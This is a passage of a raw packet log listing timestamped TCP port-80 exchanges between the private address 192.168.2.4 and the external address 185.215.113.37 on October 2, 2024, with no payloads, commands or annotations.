Oct 2, 2024 18:19:30.470161915 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.470177889 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.470181942 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.470192909 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.470207930 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.470213890 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.470225096 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.470240116 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.470246077 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.470254898 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.470258951 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.470268965 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.470283985 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.470287085 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.470299959 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.470304012 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.470314980 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.470329046 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.470334053 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.470344067 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.470359087 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.470366001 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.470374107 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.470388889 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.470407963 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.470433950 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.470597029 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.470623016 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.470637083 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.470648050 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.470653057 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.470676899 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.470712900 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.470712900 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.471381903 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.471417904 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.471451044 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.471471071 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.471494913 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.471503973 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.471518993 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.471520901 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.471539021 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.471554995 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.471564054 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.471579075 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.471601963 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.471615076 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.471626997 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.471652031 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.471668959 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.471673012 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.471682072 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.471697092 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.471709967 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.471709967 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.471724033 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.471738100 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.471740007 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.471750975 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.471755981 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.471764088 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.471776962 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.471790075 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.471802950 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.471807003 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.471807957 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.471816063 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.471827984 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.471846104 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.471856117 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.471878052 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.473448992 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.473467112 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.473484039 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.473507881 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.473521948 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.473521948 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.473525047 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.473566055 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.473575115 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.473578930 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.473589897 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.473607063 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.473614931 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.473740101 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.473829985 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.473846912 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.473864079 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.473879099 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.473884106 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.473916054 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.473958969 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.473961115 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.474030972 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.474066019 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.474082947 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.474112988 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.474117994 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.474133015 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.474138975 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.474144936 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.474150896 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.474159002 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.474184036 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.474210978 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.474225998 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.474241972 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.474268913 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.474294901 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.474317074 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.474343061 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.474355936 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.474374056 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.474390030 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.474417925 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.474430084 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.474445105 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.474453926 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.474462032 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.474463940 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.474472046 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.474505901 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.474571943 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.474589109 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.474626064 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.474626064 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.474647999 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.474690914 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.474721909 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.474740028 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.474756956 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.474771976 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.474777937 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.474787951 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.474803925 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.474812031 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.474828005 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.474831104 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.474844933 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.474859953 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.474859953 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.474885941 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.474909067 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.474910975 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.474917889 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.474927902 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.474939108 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.474944115 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.474966049 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.474981070 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.474997044 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.475043058 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.475053072 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.475069046 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.475084066 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.475092888 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.475121975 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.475137949 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.532464027 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.532483101 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.532497883 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.532546997 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.532552958 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.532576084 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.532603025 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.532643080 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.532732010 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.532747984 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.532764912 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.532779932 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.532790899 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.532793999 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.532814980 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.532860041 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.532880068 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.532903910 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.532919884 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.532929897 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.532936096 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.532952070 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.532967091 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.532975912 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.532982111 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.532996893 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.533010960 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.533014059 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.533027887 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.533042908 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.533045053 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.533056974 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.533098936 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.533220053 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.533236980 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.533252954 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.533268929 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.533286095 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.533303976 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.533310890 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.533327103 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.533340931 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.533344984 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.533354998 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.533369064 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.533385038 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.533422947 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.533503056 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.533519030 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.533535004 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.533549070 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.533556938 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.533570051 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.533577919 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.533592939 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.533607960 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.533607960 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.533633947 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.533668041 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.563189030 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.563242912 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.563249111 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.563265085 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.563281059 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.563294888 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.563297987 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.563338041 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.563369989 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.563374043 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.563404083 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.563424110 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.563427925 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.563441992 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.563446045 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.563458920 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.563467979 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.563473940 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.563498974 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.563513041 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.563528061 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.563534021 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.563550949 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.563570023 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.563591003 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.563652039 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.563673973 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.563689947 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.563704967 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.563719988 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.563720942 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.563735962 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.563751936 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.563755989 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.563771009 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.563817024 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.563858032 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.563873053 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.563888073 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.563903093 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.563911915 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.563945055 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.563965082 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.563982964 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.563997984 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.564013958 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.564033985 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.564057112 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.564064026 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.564079046 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.564084053 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.564097881 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.564106941 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.564116955 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.564130068 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.564162970 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.564169884 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.564169884 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.564178944 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.564194918 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.564213991 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.564218044 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.564248085 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.564287901 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.564296007 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.564302921 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.564325094 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.564347029 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.564366102 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.564429998 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.564445019 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.564460039 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.564471960 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.564475060 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.564490080 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.564513922 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.564523935 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.564528942 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.564544916 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.564554930 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.564593077 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.564610958 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.564773083 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.564788103 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.564802885 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.564816952 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.564829111 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.564831972 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.564846039 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.564850092 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.564862013 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.564877033 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.564886093 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.564892054 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.564913988 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.564914942 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.564928055 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.564941883 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.564959049 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.564964056 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.564970970 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.565052986 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.565056086 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.565067053 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.565073967 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.565083981 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.565099001 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.565107107 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.565114021 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.565129042 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.565150976 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.565154076 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.565166950 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.565181017 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.565181017 CEST	80	49737	185.215.113.37	192.168.2.4
